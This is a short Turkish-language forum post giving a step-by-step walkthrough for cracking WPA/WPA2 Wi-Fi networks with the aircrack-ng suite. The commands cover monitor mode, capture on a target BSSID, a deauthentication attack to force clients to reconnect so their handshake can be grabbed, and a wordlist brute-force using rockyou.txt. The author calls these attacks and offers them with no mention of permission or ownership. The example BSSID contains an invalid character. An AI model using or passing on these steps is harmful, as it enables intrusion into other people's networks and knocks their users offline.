R
Rolesa
Eski bir mantık ama ortalıkta patlamadan ilk burda paylaşım yapılsın istedim biraz brute de kullancağız başlıyalım ilkolarak adaptörümüzü monitörlemeye
ile tarama yapalım . Burda essıd lerden bir tane uygun olanı seçelim wpa2/wpa channel numarası 1 .
bu şekilde olcak şuanda paketler depolanıyor
şimdi istemcilere deauthentication atack dediğimiz saldırıları yapıp ağdan düşürceğiz sonrada tekrar bağlanırken paketleri yakalıyacağız .
bu şekildede brute saldırımızı başlata biliriz. wordlistin dizin yolunu belirttik internette az uz görmeye başladım bunu bilgi kolay yayılıyor bende patlamadan direk paylaşayım dedim
Code:
airmon-ng start wlan0
Code:
airodump-ng wlan0mon
Code:
airodump-ng wlan0mon -c 1 --bssid 12:1B:23:12:G9:04 -w WPA2
Code:
aireplay-ng –deauth 100 -e ssıd_adınız wlan0mon
Code:
aircrack-ng WPA2-01.cap -w /usr/share/wordlist/rockyou.txt -o
Last edited by a moderator: